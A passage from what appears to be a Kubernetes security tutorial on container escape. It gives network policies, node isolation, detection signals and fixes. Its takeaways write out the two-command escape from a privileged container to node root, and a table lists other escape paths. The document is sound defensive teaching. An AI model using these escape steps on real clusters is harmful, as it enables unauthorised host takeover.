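                     "(CLONE_NEW* flags are not blocked)")
    return notes
```

Applied to the profile in this section, the only note should be the one about clone, which matches the gap between the stated goal and the names list.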
Fix 4: Network Policy — Contain the Blast Radius After Escape
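Even if a container is compromised, a network policy that prevents its pod from reaching the Kubernetes API server limits what the attacker can do from inside the pod network. One caveat: NetworkPolicy governs pod traffic, so a process that has fully escaped into the node's host network namespace is generally outside its reach. Treat this layer as containment for the pod, not for the node.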
# Deny all egress from application namespace to Kubernetes API server
# The API server typically runs on port 6443 on the control plane nodes
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: block-api-server-egress
namespace: production
spec:
podSelector: {} # applies to all pods in namespace
policyTypes:
- Egress
egress:
# Allow DNS
- ports:
- protocol: UDP
port: 53
# Allow application traffic (customize per workload)
- to:
- namespaceSelector:
matchLabels:
kubernetes.io/metadata.name: production
# Explicitly: no rule allowing egress to control plane CIDR
# This is a deny-by-absence — egress to control plane falls through to default deny
# Also block pod-to-pod communication across namespaces
# to prevent an escaped pod from pivoting to other workloads
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
name: default-deny-all
namespace: production
spec:
podSelector: {}
policyTypes:
- Ingress
- Egress
# No ingress or egress rules = deny all
# Add specific rules above this as needed
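Deny-by-absence is easy to get wrong, so it can help to reason through a policy before applying it. The Python sketch below is a simplified model of how a single policy's egress rules are evaluated: traffic passes if any one rule matches both its ports and its peers, and an omitted ports or to field matches everything. It handles only ipBlock.cidr and namespaceSelector.matchLabels, ignores except, endPort, named ports, and the additive effect of multiple policies, and every function name in it is hypothetical.

```python
import ipaddress


def _port_matches(rule: dict, protocol: str, port: int) -> bool:
    ports = rule.get("ports")
    if not ports:
        return True  # no ports listed: every port matches
    return any(p.get("protocol", "TCP") == protocol and p.get("port") in (None, port)
               for p in ports)


def _peer_matches(rule: dict, dest_ip: str, dest_ns_labels) -> bool:
    peers = rule.get("to")
    if not peers:
        return True  # no peers listed: every destination matches
    for peer in peers:
        block = peer.get("ipBlock")
        if block and ipaddress.ip_address(dest_ip) in ipaddress.ip_network(block["cidr"]):
            return True
        selector = peer.get("namespaceSelector")
        if selector is not None and dest_ns_labels is not None:
            wanted = selector.get("matchLabels") or {}
            if all(dest_ns_labels.get(k) == v for k, v in wanted.items()):
                return True
    return False


def egress_allowed(policy_spec: dict, dest_ip: str, protocol: str, port: int,
                   dest_ns_labels=None) -> bool:
    """True if a pod selected by this one policy may open the connection."""
    if "Egress" not in policy_spec.get("policyTypes", []):
        return True  # this policy does not restrict egress at all
    return any(_port_matches(rule, protocol, port)
               and _peer_matches(rule, dest_ip, dest_ns_labels)
               for rule in policy_spec.get("egress") or [])
```

Under this model the first policy above denies TCP 6443 to a control plane address because no rule matches it. It also shows that the DNS rule, which lists ports but no peers, permits UDP 53 to any destination, which is worth tightening if DNS should only reach the cluster resolver.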
Fix 5: Node Isolation — Co-location Risk
An internet-facing pod and a pod with access to sensitive internal services should not share a node. If the internet-facing pod escapes, it reaches the node’s credentials and can pivot to anything else scheduled on that node.
# Use node selectors, taints, and tolerations to separate workload tiers
# Taint sensitive nodes so only specific workloads schedule there
kubectl taint nodes sensitive-node-1 workload-tier=sensitive:NoSchedule
# Internet-facing pods: dedicated public-tier nodes
# Internal/privileged pods: dedicated sensitive-tier nodes
# Pod spec for internet-facing workload — only schedules on public nodes
spec:
nodeSelector:
workload-tier: public
tolerations: [] # No toleration for sensitive node taint
# Pod spec for sensitive workload — only schedules on sensitive nodes
spec:
nodeSelector:
workload-tier: sensitive
tolerations:
- key: workload-tier
operator: Equal
value: sensitive
effect: NoSchedule
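Whether a pod can land on a tainted node comes down to toleration matching, which is simple enough to model. The Python sketch below follows the documented matching rules (key, operator, value, effect) for the taint used above; the function names are hypothetical, and it models only the taint check, not nodeSelector or the rest of the scheduler.

```python
def tolerates(toleration: dict, taint: dict) -> bool:
    """Return True if one toleration matches one taint."""
    # An empty effect on the toleration matches every taint effect.
    if toleration.get("effect") and toleration["effect"] != taint["effect"]:
        return False
    operator = toleration.get("operator", "Equal")
    key = toleration.get("key")
    if not key:
        # An empty key with operator Exists tolerates every taint.
        return operator == "Exists"
    if key != taint["key"]:
        return False
    if operator == "Exists":
        return True
    return toleration.get("value", "") == taint.get("value", "")


def passes_taints(tolerations: list, node_taints: list) -> bool:
    """True if every scheduling-blocking taint on the node is tolerated."""
    blocking = [t for t in node_taints
                if t["effect"] in ("NoSchedule", "NoExecute")]
    return all(any(tolerates(tol, taint) for tol in tolerations)
               for taint in blocking)
```

Note the asymmetry this exposes: the taint keeps untolerating pods off sensitive nodes, but it does nothing to keep sensitive pods off public nodes. That direction relies on the nodeSelector, which in turn requires the workload-tier label to actually be set on the nodes.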
⚠ Production Gotchas
Legitimate workloads that require --privileged or hostPID. CNI plugins (Cilium, Calico, Flannel node agents), node-local-dns, monitoring agents (node exporters, eBPF-based agents like Tetragon itself), and storage drivers often need elevated access. Blanket enforcement of Restricted profile without exceptions breaks these workloads. The approach: enforce Restricted on application namespaces; use a dedicated namespace for infrastructure DaemonSets with the Baseline or Privileged policy and compensate with Falco detection and node isolation.
Seccomp under Restricted blocks some monitoring agents. The RuntimeDefault seccomp profile that Restricted requires blocks several syscalls that APM agents and profiling tools use. Run strace -c -f ./your-agent to capture the syscall profile of your monitoring agent before enforcing Restricted. Common culprits: perf_event_open (used by profilers), ptrace (used by some debuggers), bpf (used by eBPF-based tools). Add these to an allowlist seccomp profile rather than running the agent without any profile.
runc CVEs require node patching, not policy. PodSecurity admission and Falco rules protect against configuration-based escapes. A vulnerability in runc, containerd, or the Linux kernel itself bypasses policy-based controls entirely. Keep container runtime versions current; enable automatic node OS patching (Bottlerocket, Flatcar Linux) if your infrastructure allows it. Subscribe to CVE feeds for containerd (containerd/containerd) and runc (opencontainers/runc) specifically.
hostPath volumes are a partial equivalent to --privileged. A pod without --privileged but with a hostPath volume mounting /etc or /var/lib/kubelet can read node credentials without needing to mount a block device. PodSecurity Baseline and Restricted both forbid hostPath volumes; only the Privileged level allows them, so any namespace left at Privileged needs its own review. Audit for hostPath volumes separately from --privileged.
RuntimeClass with gVisor has syscall compatibility gaps. Applications that use io_uring, certain socket options, or kernel modules will not work under gVisor’s sentry. Test in staging before deploying to production. The gVisor compatibility matrix is documented at gvisor.dev/docs/user_guide/compatibility — check it for any application that does direct filesystem I/O at high volume (databases, high-throughput queues) as the overhead may be unacceptable even if the syscalls are supported.
Quick Reference
| Escape Path | Precondition | Detection Signal | Structural Fix |
|---|---|---|---|
| Privileged container → mount | privileged: true | Falco: mount syscall from container; Tetragon: sys_mount kprobe | PodSecurity Restricted enforce; seccomp blocks mount |
| hostPID + nsenter | hostPID: true | Falco: nsenter exec in container; audit log: pod creation with hostPID | PodSecurity Restricted; blocks hostPID |
| hostNetwork + IMDS | hostNetwork: true | CloudTrail: IMDSv1 call from unexpected source | Enforce IMDSv2 hop limit 1; PodSecurity Restricted |
| runc CVE (CVE-2019-5736) | Unpatched runc | Tetragon: vfs_write to /proc/self/exe | Patch runc/containerd; use RuntimeClass (gVisor) |
| hostPath volume mount | hostPath to sensitive path | Falco: sensitive host file access; PodSecurity audit | PodSecurity Restricted (blocks hostPath) |
| Escaped → API server | Node credential access | Audit log: API calls from node IP at unexpected time | Network policy blocking node→API server egress |
Key Takeaways
- Kubernetes container escape starts at the kernel: --privileged, hostPID, and hostNetwork remove Linux namespace and cgroup isolation, and the Kubernetes API cannot prevent what happens inside a process that runs with those flags
- Two commands from privileged container to root on the node: mount /dev/sda1 /mnt/host and chroot /mnt/host /bin/bash. This is not a sophisticated exploit; it is default kernel behavior
- eBPF detection (Falco, Tetragon) operates at the syscall level and catches the escape in progress; Kubernetes audit logs only catch the misconfigured pod creation, not the exploitation
- PodSecurity Restricted enforcement at the namespace level is the structural fix for configuration-based escapes: it blocks --privileged, hostPID, hostNetwork, and hostPath volumes before a pod schedules
- runc-class CVEs are independent of configuration: node-level patching and RuntimeClass (gVisor/Kata) isolation are the controls, not policy enforcement
- Network policy as a secondary layer limits post-escape lateral movement: a container that escapes to the node should not be able to reach the API server with stolen node credentials
What’s Next
Container escape requires access to a running pod. But what if the attacker didn’t need to exploit anything at runtime — they shipped the attack as a dependency your build pipeline trusted? EP09 covers supply chain attacks from SolarWinds to XZ Utils: how a malicious package or a compromised build step becomes arbitrary code execution before the container ever runs, the detection patterns that are specific to supply chain compromise (dependency confusion, typosquatting, malicious maintainer takeovers), and the SLSA framework controls that create a verifiable chain of custody from source to deployed artifact.